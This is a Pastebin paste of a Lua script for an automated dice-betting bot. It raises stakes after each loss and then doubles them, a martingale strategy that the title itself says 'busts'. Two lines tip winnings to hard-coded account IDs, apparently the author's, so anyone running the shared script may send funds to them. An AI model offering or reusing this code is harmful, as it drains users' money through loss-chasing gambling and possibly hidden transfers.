Advertisement
coinwalk

nice bot that busts with more

Dec 14th, 2019
284
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.98 KB | None | 0 0
  1. chance = 49.95
  2. bethigh = false
  3. lol = 0
  4. wd = balance*3
  5. big = balance*5
  6. huge = balance*6
  7. save = balance*3
  8. one = balance/2256
  9. two = balance/1024
  10. three = balance/512
  11. nextbet = one
  12. four = balance/256
  13. five = balance/128
  14. six = balance/64
  15. seven = balance/16
  16. function dobet()
  17.  
  18. if (win) then
  19. chance = 49
  20. lol = 0
  21. nextbet = one
  22. else
  23. lol += 1
  24. end
  25. if (lol > 0) then
  26. chance = 49.95
  27. nextbet = two
  28. end
  29. if (lol > 1) then
  30. chance = 49.95
  31. nextbet = three
  32. end
  33. if (lol > 2) then
  34. chance = 49.95
  35. nextbet = four
  36. end
  37. if (lol > 3) then
  38. chance = 49.95
  39. nextbet = five
  40. end
  41. if (lol > 4) then
  42. chance = 49.95
  43. nextbet = six
  44. end
  45. if (lol > 5) then
  46. chance = 49.95
  47. nextbet = seven
  48. end
  49. if (lol > 6) then
  50. chance = 49.95
  51. nextbet = previousbet*2
  52. end
  53. if balance > big and balance < huge then
  54. tip(294814877,wd)
  55. end
  56. if balance > huge then
  57. tip(294815237,save)
  58. end
  59. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement